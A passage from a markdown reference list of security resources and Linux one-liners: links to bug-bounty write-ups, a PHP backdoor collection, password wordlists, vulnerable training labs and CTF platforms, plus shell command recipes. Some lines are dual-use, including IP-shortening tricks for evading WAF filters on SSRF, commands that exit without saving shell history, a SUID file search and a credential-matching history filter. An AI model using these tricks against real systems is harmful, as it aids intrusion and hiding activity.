:small_orange_diamond: <a href="https://github.com/ngalongc/bug-bounty-reference"><b>bug-bounty-reference</b></a> - is a list of bug bounty write-ups.<br>
:small_orange_diamond: <a href="https://github.com/devanshbatham/Awesome-Bugbounty-Writeups"><b>Awesome-Bugbounty-Writeups</b></a> - is a curated list of bugbounty writeups.<br>
:small_orange_diamond: <a href="https://hackso.me/"><b>hackso.me</b></a> - a great journey into security.<br>
</p>
##### :black_small_square: Backdoors/exploits
<p>
:small_orange_diamond: <a href="https://github.com/bartblaze/PHP-backdoors"><b>PHP-backdoors</b></a> - a collection of PHP backdoors. For educational or testing purposes only.<br>
</p>
##### :black_small_square: Wordlists and Weak passwords
<p>
:small_orange_diamond: <a href="https://weakpass.com/"><b>Weakpass</b></a> - for any kind of bruteforce find wordlists or unleash the power of them all at once!<br>
:small_orange_diamond: <a href="https://hashes.org/"><b>Hashes.org</b></a> - is a free online hash resolving service incorporating many unparalleled techniques.<br>
:small_orange_diamond: <a href="https://github.com/danielmiessler/SecLists"><b>SecLists</b></a> - collection of multiple types of lists used during security assessments, collected in one place.<br>
:small_orange_diamond: <a href="https://github.com/berzerk0/Probable-Wordlists"><b>Probable-Wordlists</b></a> - sorted by probability originally created for password generation and testing.<br>
:small_orange_diamond: <a href="https://wiki.skullsecurity.org/index.php?title=Passwords"><b>skullsecurity passwords</b></a> - password dictionaries and leaked passwords repository.<br>
:small_orange_diamond: <a href="https://bezpieka.org/polski-slownik-premium-polish-wordlist"><b>Polish PREMIUM Dictionary</b></a> - official dictionary created by the team on the forum bezpieka.org.<b>*</b> <sup><a href="https://sourceforge.net/projects/kali-linux/files/Wordlist/">1</sup><br>
:small_orange_diamond: <a href="https://github.com/insidetrust/statistically-likely-usernames"><b>statistically-likely-usernames</b></a> - wordlists for creating statistically likely username lists for use in password attacks.<br>
</p>
##### :black_small_square: Bounty platforms
<p>
:small_orange_diamond: <a href="https://www.yeswehack.com/"><b>YesWeHack</b></a> - bug bounty platform with infosec jobs.<br>
:small_orange_diamond: <a href="https://www.openbugbounty.org/"><b>Openbugbounty</b></a> - allows any security researcher reporting a vulnerability on any website.<br>
:small_orange_diamond: <a href="https://www.hackerone.com/"><b>hackerone</b></a> - global hacker community to surface the most relevant security issues.<br>
:small_orange_diamond: <a href="https://www.bugcrowd.com/"><b>bugcrowd</b></a> - crowdsourced cybersecurity for the enterprise.<br>
:small_orange_diamond: <a href="https://crowdshield.com/"><b>Crowdshield</b></a> - crowdsourced security & bug bounty management.<br>
:small_orange_diamond: <a href="https://www.synack.com/"><b>Synack</b></a> - crowdsourced security & bug bounty programs, crowd security intelligence platform and more.<br>
:small_orange_diamond: <a href="https://hacktrophy.com/en/"><b>Hacktrophy</b></a> - bug bounty platform.<br>
</p>
##### :black_small_square: Web Training Apps (local installation)
<p>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project"><b>OWASP-VWAD</b></a> - comprehensive and well maintained registry of all known vulnerable web applications.<br>
:small_orange_diamond: <a href="http://www.dvwa.co.uk/"><b>DVWA</b></a> - PHP/MySQL web application that is damn vulnerable.<br>
:small_orange_diamond: <a href="https://metasploit.help.rapid7.com/docs/metasploitable-2"><b>metasploitable2</b></a> - vulnerable web application amongst security researchers.<br>
:small_orange_diamond: <a href="https://github.com/rapid7/metasploitable3"><b>metasploitable3</b></a> - is a VM that is built from the ground up with a large amount of security vulnerabilities.<br>
:small_orange_diamond: <a href="https://github.com/stamparm/DSVW"><b>DSVW</b></a> - is a deliberately vulnerable web application written in under 100 lines of code.<br>
:small_orange_diamond: <a href="https://sourceforge.net/projects/mutillidae/"><b>OWASP Mutillidae II</b></a> - free, open source, deliberately vulnerable web-application.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project"><b>OWASP Juice Shop Project</b></a> - the most bug-free vulnerable application in existence.<br>
:small_orange_diamond: <a href="https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project"><b>OWASP Node js Goat Project</b></a> - OWASP Top 10 security risks apply to web applications developed using Node.js.<br>
:small_orange_diamond: <a href="https://github.com/iteratec/juicy-ctf"><b>juicy-ctf</b></a> - run Capture the Flags and Security Trainings with OWASP Juice Shop.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/SecurityShepherd"><b>SecurityShepherd</b></a> - web and mobile application security training platform.<br>
:small_orange_diamond: <a href="https://github.com/opendns/Security_Ninjas_AppSec_Training"><b>Security Ninjas</b></a> - open source application security training program.<br>
:small_orange_diamond: <a href="https://github.com/rapid7/hackazon"><b>hackazon</b></a> - a modern vulnerable web app.<br>
:small_orange_diamond: <a href="https://github.com/appsecco/dvna"><b>dvna</b></a> - damn vulnerable NodeJS application.<br>
:small_orange_diamond: <a href="https://github.com/DefectDojo/django-DefectDojo"><b>django-DefectDojo</b></a> - is an open-source application vulnerability correlation and security orchestration tool.<br>
:small_orange_diamond: <a href="https://google-gruyere.appspot.com/"><b>Google Gruyere</b></a> - web application exploits and defenses.<br>
:small_orange_diamond: <a href="https://github.com/amolnaik4/bodhi"><b>Bodhi</b></a> - is a playground focused on learning the exploitation of client-side web vulnerabilities.<br>
:small_orange_diamond: <a href="https://websploit.h4cker.org/"><b>Websploit</b></a> - single vm lab with the purpose of combining several vulnerable appliations in one environment.<br>
:small_orange_diamond: <a href="https://github.com/vulhub/vulhub"><b>vulhub</b></a> - pre-built Vulnerable Environments based on docker-compose.<br>
:small_orange_diamond: <a href="https://rhinosecuritylabs.com/aws/introducing-cloudgoat-2/"><b>CloudGoat 2</b></a> - the new & improved "Vulnerable by Design"
AWS deployment tool.<br>
:small_orange_diamond: <a href="https://github.com/globocom/secDevLabs"><b>secDevLabs</b></a> - is a laboratory for learning secure web development in a practical manner.<br>
:small_orange_diamond: <a href="https://github.com/incredibleindishell/CORS-vulnerable-Lab"><b>CORS-vulnerable-Lab</b></a> - sample vulnerable code and its exploit code.<br>
:small_orange_diamond: <a href="https://github.com/moloch--/RootTheBox"><b>RootTheBox</b></a> - a Game of Hackers (CTF Scoreboard & Game Manager).<br>
</p>
##### :black_small_square: Labs (ethical hacking platforms/trainings/CTFs)
<p>
:small_orange_diamond: <a href="https://www.offensive-security.com/"><b>Offensive Security</b></a> - true performance-based penetration testing training for over a decade.<br>
:small_orange_diamond: <a href="https://www.hackthebox.eu/"><b>Hack The Box</b></a> - online platform allowing you to test your penetration testing skills.<br>
:small_orange_diamond: <a href="https://www.hacking-lab.com/index.html"><b>Hacking-Lab</b></a> - online ethical hacking, computer network and security challenge platform.<br>
:small_orange_diamond: <a href="http://pwnable.kr/index.php"><b>pwnable.kr</b></a> - non-commercial wargame site which provides various pwn challenges regarding system exploitation.<br>
:small_orange_diamond: <a href="https://pwnable.tw/"><b>Pwnable.tw</b></a> - is a wargame site for hackers to test and expand their binary exploiting skills.<br>
:small_orange_diamond: <a href="https://picoctf.com/"><b>picoCTF</b></a> - is a free computer security game targeted at middle and high school students.<br>
:small_orange_diamond: <a href="https://ctflearn.com/"><b>CTFlearn</b></a> - is an online platform built to help ethical hackers learn and practice their cybersecurity knowledge and skills.<br>
:small_orange_diamond: <a href="https://ctftime.org/"><b>ctftime</b></a> - CTF archive and a place, where you can get some another CTF-related info.<br>
:small_orange_diamond: <a href="https://silesiasecuritylab.com/"><b>Silesia Security Lab</b></a> - high quality security testing services.<br>
:small_orange_diamond: <a href="https://practicalpentestlabs.com/"><b>Practical Pentest Labs</b></a> - pentest lab, take your Hacking skills to the next level.<br>
:small_orange_diamond: <a href="https://www.root-me.org/?lang=en"><b>Root Me</b></a> - the fast, easy, and affordable way to train your hacking skills.<br>
:small_orange_diamond: <a href="https://rozwal.to/login"><b>rozwal.to</b></a> - a great platform to train your pentesting skills.<br>
:small_orange_diamond: <a href="https://tryhackme.com/"><b>TryHackMe</b></a> - learning Cyber Security made easy.<br>
:small_orange_diamond: <a href="https://hackxor.net/"><b>hackxor</b></a> - is a realistic web application hacking game, designed to help players of all abilities develop their skills.<br>
:small_orange_diamond: <a href="http://hack-yourself-first.com/"><b>Hack Yourself First</b></a> - it's full of nasty app sec holes.<br>
:small_orange_diamond: <a href="http://overthewire.org/wargames/"><b>OverTheWire</b></a> - can help you to learn and practice security concepts in the form of fun-filled games.<br>
:small_orange_diamond: <a href="https://labs.wizard-security.net/"><b>Wizard Labs</b></a> - is an online Penetration Testing Lab.<br>
:small_orange_diamond: <a href="https://pentesterlab.com/"><b>PentesterLab</b></a> - provides vulnerable systems that can be used to test and understand vulnerabilities.<br>
:small_orange_diamond: <a href="https://ringzer0ctf.com/"><b>RingZer0</b></a> - tons of challenges designed to test and improve your hacking skills.<br>
:small_orange_diamond: <a href="http://www.try2hack.nl/"><b>try2hack</b></a> - several security-oriented challenges for your entertainment.<br>
:small_orange_diamond: <a href="https://www.ubeeri.com/preconfig-labs"><b>Ubeeri</b></a> - preconfigured lab environments.<br>
:small_orange_diamond: <a href="https://lab.pentestit.ru/"><b>Pentestit</b></a> - emulate IT infrastructures of real companies for legal pen testing and improving penetration testing skills.<br>
:small_orange_diamond: <a href="https://microcorruption.com/login"><b>Microcorruption</b></a> - reversal challenges done in the web interface.<br>
:small_orange_diamond: <a href="https://crackmes.one/"><b>Crackmes</b></a> - download crackmes to help improve your reverse engineering skills.<br>
:small_orange_diamond: <a href="https://domgo.at/cxss/intro"><b>DomGoat</b></a> - DOM XSS security learning and practicing platform.<br>
:small_orange_diamond: <a href="https://chall.stypr.com"><b>Stereotyped Challenges</b></a> - upgrade your web hacking techniques today!<br>
:small_orange_diamond: <a href="https://www.vulnhub.com/"><b>Vulnhub</b></a> - allows anyone to gain practical 'hands-on' experience in digital security.<br>
:small_orange_diamond: <a href="https://w3challs.com/"><b>W3Challs</b></a> - is a penetration testing training platform, which offers various computer challenges.<br>
:small_orange_diamond: <a href="https://ringzer0ctf.com/challenges"><b>RingZer0 CTF</b></a> - offers you tons of challenges designed to test and improve your hacking skills.<br>
:small_orange_diamond: <a href="https://hack.me/"><b>Hack.me</b></a> - a platform where you can build, host and share vulnerable web apps for educational and research purposes.<br>
:small_orange_diamond: <a href="https://www.hackthis.co.uk/levels/"><b>HackThis!</b></a> - discover how hacks, dumps and defacements are performed and secure your website against hackers.<br>
:small_orange_diamond: <a href="https://www.enigmagroup.org/#"><b>Enigma Group WebApp Training</b></a> - these challenges cover the exploits listed in the OWASP Top 10 Project.<br>
:small_orange_diamond: <a href="https://challenges.re/"><b>Reverse Engineering Challenges</b></a> - challenges, exercises, problems and tasks - by level, by type, and more.<br>
:small_orange_diamond: <a href="https://0x00sec.org/"><b>0x00sec</b></a> - the home of the Hacker - Malware, Reverse Engineering, and Computer Science.<br>
:small_orange_diamond: <a href="https://www.wechall.net/challs"><b>We Chall</b></a> - there are exist a lots of different challenge types.<br>
:small_orange_diamond: <a href="https://www.hackergateway.com/"><b>Hacker Gateway</b></a> - is the go-to place for hackers who want to test their skills.<br>
:small_orange_diamond: <a href="https://www.hacker101.com/"><b>Hacker101</b></a> - is a free class for web security.<br>
:small_orange_diamond: <a href="https://contained.af/"><b>contained.af</b></a> - a stupid game for learning about containers, capabilities, and syscalls.<br>
:small_orange_diamond: <a href="http://flaws.cloud/"><b>flAWS challenge!</b></a> - a series of levels you'll learn about common mistakes and gotchas when using AWS.<br>
:small_orange_diamond: <a href="https://cybersecurity.wtf"><b>CyberSec WTF</b></a> - provides web hacking challenges derived from bounty write-ups.<br>
:small_orange_diamond: <a href="https://ctfchallenge.co.uk/login"><b>CTF Challenge</b></a> - CTF Web App challenges.<br>
:small_orange_diamond: <a href="https://capturetheflag.withgoogle.com"><b>gCTF</b></a> - most of the challenges used in the Google CTF 2017.<br>
:small_orange_diamond: <a href="https://www.hackthissite.org/pages/index/index.php"><b>Hack This Site</b></a> - is a free, safe and legal training ground for hackers.<br>
:small_orange_diamond: <a href="https://attackdefense.com"><b>Attack & Defense</b></a> - is a browser-based cloud labs.<br>
:small_orange_diamond: <a href="https://cryptohack.org/"><b>Cryptohack</b></a> - a fun platform for learning modern cryptography.<br>
</p>
##### :black_small_square: CTF platforms
<p>
:small_orange_diamond: <a href="https://github.com/facebook/fbctf"><b>fbctf</b></a> - platform to host Capture the Flag competitions.<br>
:small_orange_diamond: <a href="https://github.com/google/ctfscoreboard"><b>ctfscoreboard</b></a> - scoreboard for Capture The Flag competitions.<br>
</p>
##### :black_small_square: Other resources
<p>
:small_orange_diamond: <a href="https://github.com/bugcrowd/bugcrowd_university"><b>Bugcrowd University</b></a> - open source education content for the researcher community.<br>
:small_orange_diamond: <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - a list of resources and scripts that I have been gathering in preparation for the OSCP.<br>
:small_orange_diamond: <a href="https://medium.com/@cxosmo/owasp-top-10-real-world-examples-part-1-a540c4ea2df5"><b>OWASP Top 10: Real-World Examples</b></a> - test your web apps with real-world examples (two-part series).<br>
:small_orange_diamond: <a href="http://phrack.org/index.html"><b>phrack.org</b></a> - an awesome collection of articles from several respected hackers and other thinkers.<br>
:small_orange_diamond: <a href="https://github.com/Gr1mmie/Practical-Ethical-Hacking-Resources"><b>Practical-Ethical-Hacking-Resources</b></a> - compilation of resources from TCM's Udemy Course.<br>
</p>
#### Your daily knowledge and news [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: RSS Readers
<p>
:small_orange_diamond: <a href="https://feedly.com/"><b>Feedly</b></a> - organize, read and share what matters to you.<br>
:small_orange_diamond: <a href="https://www.inoreader.com/"><b>Inoreader</b></a> - similar to feedly with a support for filtering what you fetch from rss.<br>
</p>
##### :black_small_square: IRC Channels
<p>
:small_orange_diamond: <a href="https://wiki.hackerspaces.org/IRC_Channel"><b>#hackerspaces</b></a> - hackerspace IRC channels.<br>
</p>
##### :black_small_square: Security
<p>
:small_orange_diamond: <a href="https://thehackernews.com/"><b>The Hacker News</b></a> - leading news source dedicated to promoting awareness for security experts and hackers.<br>
:small_orange_diamond: <a href="https://latesthackingnews.com/"><b>Latest Hacking News</b></a> - provides the latest hacking news, exploits and vulnerabilities for ethical hackers.<br>
:small_orange_diamond: <a href="https://securitynewsletter.co/"><b>Security Newsletter</b></a> - security news as a weekly digest (email notifications).<br>
:small_orange_diamond: <a href="https://security.googleblog.com/"><b>Google Online Security Blog</b></a> - the latest news and insights from Google on security and safety on the Internet.<br>
:small_orange_diamond: <a href="https://blog.qualys.com/"><b>Qualys Blog</b></a> - expert network security guidance and news.<br>
:small_orange_diamond: <a href="https://www.darkreading.com/"><b>DARKReading</b></a> - connecting the Information Security Community.<br>
:small_orange_diamond: <a href="https://www.darknet.org.uk/"><b>Darknet</b></a> - latest hacking tools, hacker news, cybersecurity best practices, ethical hacking & pen-testing.<br>
:small_orange_diamond: <a href="https://twitter.com/disclosedh1"><b>publiclyDisclosed</b></a> - public disclosure watcher who keeps you up to date about the recently disclosed bugs.<br>
:small_orange_diamond: <a href="https://www.reddit.com/r/hacking/"><b>Reddit - Hacking</b></a> - a subreddit dedicated to hacking and hackers.<br>
:small_orange_diamond: <a href="https://packetstormsecurity.com/"><b>Packet Storm</b></a> - information security services, news, files, tools, exploits, advisories and whitepapers.<br>
:small_orange_diamond: <a href="https://sekurak.pl/"><b>Sekurak</b></a> - about security, penetration tests, vulnerabilities and many others (PL/EN).<br>
:small_orange_diamond: <a href="https://nfsec.pl/"><b>nf.sec</b></a> - basic aspects and mechanisms of Linux operating system security (PL).<br>
</p>
##### :black_small_square: Other/All-in-one
<p>
:small_orange_diamond: <a href="https://changelog.com/"><b>Changelog</b></a> - is a community of hackers; news & podcasts for developers and hackers.<br>
</p>
#### Other Cheat Sheets [<sup>[TOC]</sup>](#anger-table-of-contents)
###### Build your own DNS Servers
<p>
:small_orange_diamond: <a href="https://calomel.org/unbound_dns.html"><b>Unbound DNS Tutorial</b></a> - a validating, recursive, and caching DNS server.<br>
:small_orange_diamond: <a href="https://www.ctrl.blog/entry/knot-dns-resolver-tutorial.html"><b>Knot Resolver on Fedora</b></a> - how to get faster and more secure DNS resolution with Knot Resolver on Fedora.<br>
:small_orange_diamond: <a href="https://www.aaflalo.me/2018/10/tutorial-setup-dns-over-https-server/"><b>DNS-over-HTTPS</b></a> - tutorial to setup your own DNS-over-HTTPS (DoH) server.<br>
:small_orange_diamond: <a href="https://hacks.mozilla.org/2018/05/a-cartoon-intro-to-dns-over-https/"><b>dns-over-https</b></a> - a cartoon intro to DNS over HTTPS.<br>
:small_orange_diamond: <a href="https://www.aaflalo.me/2019/03/dns-over-tls/"><b>DNS-over-TLS</b></a> - following to your DoH server, setup your DNS-over-TLS (DoT) server.<br>
:small_orange_diamond: <a href="https://zwischenzugs.com/2018/01/26/how-and-why-i-run-my-own-dns-servers/"><b>DNS Servers</b></a> - how (and why) i run my own DNS Servers.<br>
</p>
###### Build your own Certificate Authority
<p>
:small_orange_diamond: <a href="https://jamielinux.com/docs/openssl-certificate-authority/"><b>OpenSSL Certificate Authority</b></a> - build your own certificate authority (CA) using the OpenSSL command-line tools.<br>
:small_orange_diamond: <a href="https://github.com/smallstep/certificates"><b>step-ca Certificate Authority</b></a> - build your own certificate authority (CA) using open source step-ca.<br>
</p>
###### Build your own System/Virtual Machine
<p>
:small_orange_diamond: <a href="https://github.com/cfenollosa/os-tutorial"><b>os-tutorial</b></a> - how to create an OS from scratch.<br>
:small_orange_diamond: <a href="https://justinmeiners.github.io/lc3-vm/"><b>Write your Own Virtual Machine</b></a> - how to write your own virtual machine (VM).<br>
:small_orange_diamond: <a href="https://github.com/cirosantilli/x86-bare-metal-examples"><b>x86 Bare Metal Examples</b></a> - dozens of minimal operating systems to learn x86 system programming.<br>
:small_orange_diamond: <a href="https://github.com/djhworld/simple-computer"><b>simple-computer</b></a> - the scott CPU from "But How Do It Know?" by J. Clark Scott.<br>
</p>
###### DNS Servers list (privacy)
| <b><u>IP</u></b> | <b><u>URL</u></b> |
| :--- | :--- |
| **`84.200.69.80`** | [dns.watch](https://dns.watch/) |
| **`94.247.43.254`** | [opennic.org](https://www.opennic.org/) |
| **`64.6.64.6`** | [verisign.com](https://www.verisign.com/en_US/security-services/public-dns/index.xhtml) |
| **`89.233.43.71`** | [censurfridns.dk](https://blog.uncensoreddns.org/) |
| **`1.1.1.1`** | [cloudflare.com](https://1.1.1.1/) |
| **`94.130.110.185`** | [dnsprivacy.at](https://dnsprivacy.at/) |
###### TOP Browser extensions
| <b><u>Extension name</u></b> | <b><u>Description</u></b> |
| :--- | :--- |
| **`IPvFoo`** | Display the server IP address and HTTPS information across all page elements. |
| **`FoxyProxy`** | Simplifies configuring browsers to access proxy-servers. |
| **`HTTPS Everywhere`** | Automatically use HTTPS security on many sites. |
| **`uMatrix`** | Point & click to forbid/allow any class of requests made by your browser. |
| **`uBlock Origin`** | An efficient blocker: easy on memory and CPU footprint. |
| **`Session Buddy`** | Manage browser tabs and bookmarks with ease. |
| **`SuperSorter`** | Sort bookmarks recursively, delete duplicates, merge folders and more. |
| **`Clear Cache`** | Clear your cache and browsing data. |
| **`d3coder`** | Encoding/Decoding plugin for various types of encoding. |
| **`Web Developer`** | Adds a toolbar button with various web developer tools. |
| **`ThreatPinch Lookup`** | Add threat intelligence hover tool tips. |
###### TOP Burp extensions
| <b><u>Extension name</u></b> | <b><u>Description</u></b> |
| :--- | :--- |
| **`Autorize`** | Automatically detects authorization enforcement. |
| **`Reflection`** | An efficient blocker: easy on memory and CPU footprint. |
| **`Logger++`** | Logs requests and responses for all Burp tools in a sortable table. |
| **`Bypass WAF`** | Adds headers useful for bypassing some WAF devices. |
| **`JSON Beautifier`** | Beautifies JSON content in the HTTP message viewer. |
| **`JSON Web Tokens`** | Enables Burp to decode and manipulate JSON web tokens. |
| **`CSP Auditor`** | Displays CSP headers for responses, and passively reports CSP weaknesses. |
| **`CSP-Bypass`** | Passively scans for CSP headers that contain known bypasses. |
| **`Hackvertor`** | Converts data using a tag-based configuration to apply various encoding. |
| **`Active Scan++`** | Extends Burp's active and passive scanning capabilities. |
| **`HTML5 Auditor`** | Scans for usage of risky HTML5 features. |
| **`Software Vulnerability Scanner`** | Software vulnerability scanner based on Vulners.com audit API. |
###### Hack Mozilla Firefox addressbar
In Firefox's addressbar, you can limit results by typing special characters before or after your term:
- `^` - for matches in your browsing history
- `*` - for matches in your bookmarks.
- `%` - for matches in your currently open tabs.
- `#` - for matches in page titles.
- `@` - for matches in web addresses.
###### Bypass WAFs by Shortening IP Address (by [0xInfection](https://twitter.com/0xInfection))
IP addresses can be shortened by dropping the zeroes:
```
http://1.0.0.1 → http://1.1
http://127.0.0.1 → http://127.1
http://192.168.0.1 → http://192.168.1
http://0xC0A80001 or http://3232235521 → 192.168.0.1
http://192.168.257 → 192.168.1.1
http://192.168.516 → 192.168.2.4
```
> This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted.
For more information please see [How to Obscure Any URL](http://www.pc-help.org/obscure.htm) and [Magic IP Address Shortcuts](https://stuff-things.net/2014/09/25/magic-ip-address-shortcuts/).
#### One-liners [<sup>[TOC]</sup>](#anger-table-of-contents)
##### Table of Contents
* [terminal](#tool-terminal)
* [busybox](#tool-busybox)
* [mount](#tool-mount)
* [fuser](#tool-fuser)
* [lsof](#tool-lsof)
* [ps](#tool-ps)
* [top](#tool-top)
* [vmstat](#tool-vmstat)
* [iostat](#tool-iostat)
* [strace](#tool-strace)
* [kill](#tool-kill)
* [find](#tool-find)
* [diff](#tool-diff)
* [vimdiff](#tool-vimdiff)
* [tail](#tool-tail)
* [cpulimit](#tool-cpulimit)
* [pwdx](#tool-pwdx)
* [tr](#tool-tr)
* [chmod](#tool-chmod)
* [who](#tool-who)
* [last](#tool-last)
* [screen](#tool-screen)
* [script](#tool-script)
* [du](#tool-du)
* [inotifywait](#tool-inotifywait)
* [openssl](#tool-openssl)
* [secure-delete](#tool-secure-delete)
* [dd](#tool-dd)
* [gpg](#tool-gpg)
* [system-other](#tool-system-other)
* [curl](#tool-curl)
* [httpie](#tool-httpie)
* [ssh](#tool-ssh)
* [linux-dev](#tool-linux-dev)
* [tcpdump](#tool-tcpdump)
* [tcpick](#tool-tcpick)
* [ngrep](#tool-ngrep)
* [hping3](#tool-hping3)
* [nmap](#tool-nmap)
* [netcat](#tool-netcat)
* [socat](#tool-socat)
* [p0f](#tool-p0f)
* [gnutls-cli](#tool-gnutls-cli)
* [netstat](#tool-netstat)
* [rsync](#tool-rsync)
* [host](#tool-host)
* [dig](#tool-dig)
* [certbot](#tool-certbot)
* [network-other](#tool-network-other)
* [git](#tool-git)
* [awk](#tool-awk)
* [sed](#tool-sed)
* [grep](#tool-grep)
* [perl](#tool-perl)
##### Tool: [terminal](https://en.wikipedia.org/wiki/Linux_console)
###### Reload shell without exit
```bash
exec $SHELL -l
```
###### Close shell keeping all subprocess running
```bash
disown -a && exit
```
###### Exit without saving shell history
```bash
kill -9 $$
unset HISTFILE && exit
```
###### Perform a branching conditional
```bash
true && echo success
false || echo failed
```
###### Pipe stdout and stderr to separate commands
```bash
some_command > >(/bin/cmd_for_stdout) 2> >(/bin/cmd_for_stderr)
```
###### Redirect stdout and stderr each to separate files and print both to the screen
```bash
(some_command 2>&1 1>&3 | tee errorlog ) 3>&1 1>&2 | tee stdoutlog
```
###### List of commands you use most often
```bash
history | \
awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a;}' | \
grep -v "./" | \
column -c3 -s " " -t | \
sort -nr | nl | head -n 20
```
###### Sterilize bash history
```bash
function sterile() {
history | awk '$2 != "history" { $1=""; print $0 }' | egrep -vi "\
curl\b+.*(-E|--cert)\b+.*\b*|\
curl\b+.*--pass\b+.*\b*|\
curl\b+.*(-U|--proxy-user).*:.*\b*|\
curl\b+.*(-u|--user).*:.*\b*
.*(-H|--header).*(token|auth.*)\b+.*|\
wget\b+.*--.*password\b+.*\b*|\
http.?://.+:.+@.*\
" > $HOME/histbuff; history -r $HOME/histbuff;
}
export PROMPT_COMMAND="sterile"
```
> Look also: [A naive utility to censor credentials in command history](https://github.com/lbonanomi/go/blob/master/revisionist.go).
###### Quickly backup a file
```bash
cp filename{,.orig}
```
###### Empty a file (truncate to 0 size)
```bash
>filename
```
###### Delete all files in a folder that don't match a certain file extension
```bash
rm !(*.foo|*.bar|*.baz)
```
###### Pass multi-line string to a file
```bash
# cat >filename ... - overwrite the file
# cat >>filename ... - append to a file
cat > filename << __EOF__
data data data
__EOF__
```
###### Edit a file on a remote host using vim
```bash
vim scp://user@host//etc/fstab
```
###### Create a directory and change into it at the same time
```bash
mkd() { mkdir -p "$@" && cd "$@"; }
```
###### Convert uppercase files to lowercase files
```bash
rename 'y/A-Z/a-z/' *
```
###### Print a row of characters across the terminal
```bash
printf "%`tput cols`s" | tr ' ' '#'
```
###### Show shell history without line numbers
```bash
history | cut -c 8-
fc -l -n 1 | sed 's/^\s*//'
```
###### Run command(s) after exit session
```bash
cat > /etc/profile << __EOF__
_after_logout() {
username=$(whoami)
for _pid in $(ps afx | grep sshd | grep "$username" | awk '{print $1}') ; do
kill -9 $_pid
done
}
trap _after_logout EXIT
__EOF__
```
###### Generate a sequence of numbers
```bash
for ((i=1; i<=10; i+=2)) ; do echo $i ; done
# alternative: seq 1 2 10
for ((i=5; i<=10; ++i)) ; do printf '%02d\n' $i ; done
# alternative: seq -w 5 10
for i in {1..10} ; do echo $i ; done
```
###### Simple Bash filewatching
```bash
unset MAIL; export MAILCHECK=1; export MAILPATH='$FILE_TO_WATCH?$MESSAGE'
```
---
##### Tool: [busybox](https://www.busybox.net/)
###### Static HTTP web server
```bash
busybox httpd -p $PORT -h $HOME [-c httpd.conf]
```
___
##### Tool: [mount](https://en.wikipedia.org/wiki/Mount_(Unix))
###### Mount a temporary ram partition
```bash
mount -t tmpfs tmpfs /mnt -o size=64M
```
* `-t` - filesystem type
* `-o` - mount options
###### Remount a filesystem as read/write
```bash
mount -o remount,rw /
```
___
##### Tool: [fuser](https://en.wikipedia.org/wiki/Fuser_(Unix))
###### Show which processes use the files/directories
```bash
fuser /var/log/daemon.log
fuser -v /home/supervisor
```
###### Kills a process that is locking a file
```bash
fuser -ki filename
```
* `-i` - interactive option
###### Kills a process that is locking a file with specific signal
```bash
fuser -k -HUP filename
```
* `--list-signals` - list available signal names
###### Show what PID is listening on specific port
```bash
fuser -v 53/udp
```
###### Show all processes using the named filesystems or block device
```bash
fuser -mv /var/www
```
___
##### Tool: [lsof](https://en.wikipedia.org/wiki/Lsof)
###### Show process that use internet connection at the moment
```bash
lsof -P -i -n
```
###### Show process that use specific port number
```bash
lsof -i tcp:443
```
###### Lists all listening ports together with the PID of the associated process
```bash
lsof -Pan -i tcp -i udp
```
###### List all open ports and their owning executables
```bash
lsof -i -P | grep -i "listen"
```
###### Show all open ports
```bash
lsof -Pnl -i
```
###### Show open ports (LISTEN)
```bash
lsof -Pni4 | grep LISTEN | column -t
```
###### List all files opened by a particular command
```bash
lsof -c "process"
```
###### View user activity per directory
```bash
lsof -u username -a +D /etc
```
###### Show 10 largest open files
```bash
lsof / | \
awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | \
sort -n -u | tail | column -t
```
###### Show current working directory of a process
```bash
lsof -p <PID> | grep cwd
```
___
##### Tool: [ps](https://en.wikipedia.org/wiki/Ps_(Unix))
###### Show a 4-way scrollable process tree with full details
```bash
ps awwfux | less -S
```
###### Processes per user counter
```bash
ps hax -o user | sort | uniq -c | sort -r
```
###### Show all processes by name with main header
```bash
ps -lfC nginx
```
___
##### Tool: [find](https://en.wikipedia.org/wiki/Find_(Unix))
###### Find files that have been modified on your system in the past 60 minutes
```bash
find / -mmin 60 -type f
```
###### Find all files larger than 20M
```bash
find / -type f -size +20M
```
###### Find duplicate files (based on MD5 hash)
```bash
find -type f -exec md5sum '{}' ';' | sort | uniq --all-repeated=separate -w 33
```
###### Change permission only for files
```bash
cd /var/www/site && find . -type f -exec chmod 766 {} \;
cd /var/www/site && find . -type f -exec chmod 664 {} +
```
###### Change permission only for directories
```bash
cd /var/www/site && find . -type d -exec chmod g+x {} \;
cd /var/www/site && find . -type d -exec chmod g+rwx {} +
```
###### Find files and directories for specific user/group
```bash
# User:
find . -user <username> -print
find /etc -type f -user <username> -name "*.conf"
# Group:
find /opt -group <group>
find /etc -type f -group <group> -iname "*.conf"
```
###### Find files and directories for all without specific user/group
```bash
# User:
find . \! -user <username> -print
# Group:
find . \! -group <group>
```
###### Looking for files/directories that only have certain permission
```bash
# User
find . -user <username> -perm -u+rw # -rw-r--r--
find /home -user $(whoami) -perm 777 # -rwxrwxrwx
# Group:
find /home -type d -group <group> -perm 755 # -rwxr-xr-x
```
###### Delete older files than 60 days
```bash
find . -type f -mtime +60 -delete
```
###### Recursively remove all empty sub-directories from a directory
```bash
find . -depth -type d -empty -exec rmdir {} \;
```
###### How to find all hard links to a file
```bash
find </path/to/dir> -xdev -samefile filename
```
###### Recursively find the latest modified files
```bash
find . -type f -exec stat --format '%Y :%y %n' "{}" \; | sort -nr | cut -d: -f2- | head
```
###### Recursively find/replace of a string with sed
```bash
find . -not -path '*/\.git*' -type f -print0 | xargs -0 sed -i 's/foo/bar/g'
```
###### Recursively find/replace of a string in directories and file names
```bash
find . -depth -name '*test*' -execdir bash -c 'mv -v "$1" "${1//foo/bar}"' _ {} \;
```
###### Recursively find suid executables
```bash
find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;
```
___
##### Tool: [top](https://en.wikipedia.org/wiki/Top_(software))
###### Use top to monitor only all processes with the specific string
```bash
top -p $(pgrep -d , <str>)
```
* `<str>` - process containing string (eg. nginx, worker)
___
